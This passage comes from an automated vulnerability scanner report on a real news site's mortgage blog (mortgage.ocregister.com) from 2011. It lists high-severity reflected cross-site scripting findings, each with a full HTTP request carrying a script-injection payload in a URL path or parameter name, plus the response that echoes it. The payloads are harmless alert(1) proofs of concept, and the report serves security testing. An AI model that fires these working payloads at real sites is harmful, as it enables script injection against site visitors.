HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:15 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:16 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62653
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/094c5ee\"><script>alert(1)</script>57e09d4d961/feed/" /> ...[SNIP]...
1.271. http://mortgage.ocregister.com/2008/09/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2008/09/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f1dce'><script>alert(1)</script>c8a81c077b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f1dce\\\'><script>alert(1)</script>c8a81c077b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/09/?f1dce'><script>alert(1)</script>c8a81c077b7=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:14:09 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 112237
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <a href='/2008/09/?f1dce\\\'><script>alert(1)</script>c8a81c077b7=1&dem_add_user_answer=true&dem_poll_id=34' rel='nofollow' onclick='return dem_addAnswer(this)' class='dem-add-answer'> ...[SNIP]...
1.272. http://mortgage.ocregister.com/2008/09/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2008/09/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e00c"><script>alert(1)</script>73475f88de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2e00c\"><script>alert(1)</script>73475f88de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/09/?2e00c"><script>alert(1)</script>73475f88de=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:14:03 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 112212
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2008 September - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/09/?2e00c\"><script>alert(1)</script>73475f88de=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e3b3"><script>alert(1)</script>c80cc7f5054 was submitted in the REST URL parameter 1. This input was echoed as 7e3b3\"><script>alert(1)</script>c80cc7f5054 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /20087e3b3"><script>alert(1)</script>c80cc7f5054/10/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:09 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:09 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20087e3b3\"><script>alert(1)</script>c80cc7f5054/10/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf0d1"><script>alert(1)</script>8fa7ed5b19f was submitted in the REST URL parameter 2. This input was echoed as bf0d1\"><script>alert(1)</script>8fa7ed5b19f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/10bf0d1"><script>alert(1)</script>8fa7ed5b19f/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:11 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:12 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/10bf0d1\"><script>alert(1)</script>8fa7ed5b19f/feed/" /> ...[SNIP]...
1.275. http://mortgage.ocregister.com/2008/10/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2008/10/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eae4c"><script>alert(1)</script>170041f3cf9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eae4c\"><script>alert(1)</script>170041f3cf9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/10/?eae4c"><script>alert(1)</script>170041f3cf9=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:14:05 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 110972
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2008 October - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/10/?eae4c\"><script>alert(1)</script>170041f3cf9=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fc1b"><script>alert(1)</script>2d130c53a29 was submitted in the REST URL parameter 1. This input was echoed as 6fc1b\"><script>alert(1)</script>2d130c53a29 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /20086fc1b"><script>alert(1)</script>2d130c53a29/11/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:09 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:09 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20086fc1b\"><script>alert(1)</script>2d130c53a29/11/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3cd6"><script>alert(1)</script>c5248f34aad was submitted in the REST URL parameter 2. This input was echoed as b3cd6\"><script>alert(1)</script>c5248f34aad in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/11b3cd6"><script>alert(1)</script>c5248f34aad/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:12 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:12 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/11b3cd6\"><script>alert(1)</script>c5248f34aad/feed/" /> ...[SNIP]...
1.278. http://mortgage.ocregister.com/2008/11/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2008/11/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59bc7"><script>alert(1)</script>a0f4b09cc80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 59bc7\"><script>alert(1)</script>a0f4b09cc80 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/11/?59bc7"><script>alert(1)</script>a0f4b09cc80=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:14:04 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 109418
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2008 November - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/11/?59bc7\"><script>alert(1)</script>a0f4b09cc80=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb99f"><script>alert(1)</script>73505128c2a was submitted in the REST URL parameter 1. This input was echoed as fb99f\"><script>alert(1)</script>73505128c2a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008fb99f"><script>alert(1)</script>73505128c2a/12/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:13:57 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:13:58 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008fb99f\"><script>alert(1)</script>73505128c2a/12/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f6bd"><script>alert(1)</script>e08417cca0d was submitted in the REST URL parameter 2. This input was echoed as 9f6bd\"><script>alert(1)</script>e08417cca0d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/129f6bd"><script>alert(1)</script>e08417cca0d/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:02 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:03 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/129f6bd\"><script>alert(1)</script>e08417cca0d/feed/" /> ...[SNIP]...
1.281. http://mortgage.ocregister.com/2008/12/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2008/12/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 581fa"><script>alert(1)</script>91923fa8a10 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 581fa\"><script>alert(1)</script>91923fa8a10 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/12/?581fa"><script>alert(1)</script>91923fa8a10=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:13:54 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 99492
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2008 December - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/12/?581fa\"><script>alert(1)</script>91923fa8a10=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d904e"><script>alert(1)</script>ffe0d03125f was submitted in the REST URL parameter 1. This input was echoed as d904e\"><script>alert(1)</script>ffe0d03125f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009d904e"><script>alert(1)</script>ffe0d03125f/01/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:13:58 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:13:59 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009d904e\"><script>alert(1)</script>ffe0d03125f/01/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17425"><script>alert(1)</script>04dd09f1aff was submitted in the REST URL parameter 2. This input was echoed as 17425\"><script>alert(1)</script>04dd09f1aff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/0117425"><script>alert(1)</script>04dd09f1aff/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:03 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:03 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/0117425\"><script>alert(1)</script>04dd09f1aff/feed/" /> ...[SNIP]...
1.284. http://mortgage.ocregister.com/2009/01/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2009/01/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dfd6"><script>alert(1)</script>57a08275a9d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7dfd6\"><script>alert(1)</script>57a08275a9d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/01/?7dfd6"><script>alert(1)</script>57a08275a9d=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:13:53 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 105655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2009 January - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/01/?7dfd6\"><script>alert(1)</script>57a08275a9d=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aae10"><script>alert(1)</script>bd79c7c5eb was submitted in the REST URL parameter 1. This input was echoed as aae10\"><script>alert(1)</script>bd79c7c5eb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009aae10"><script>alert(1)</script>bd79c7c5eb/02/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:13:50 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:13:51 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62654
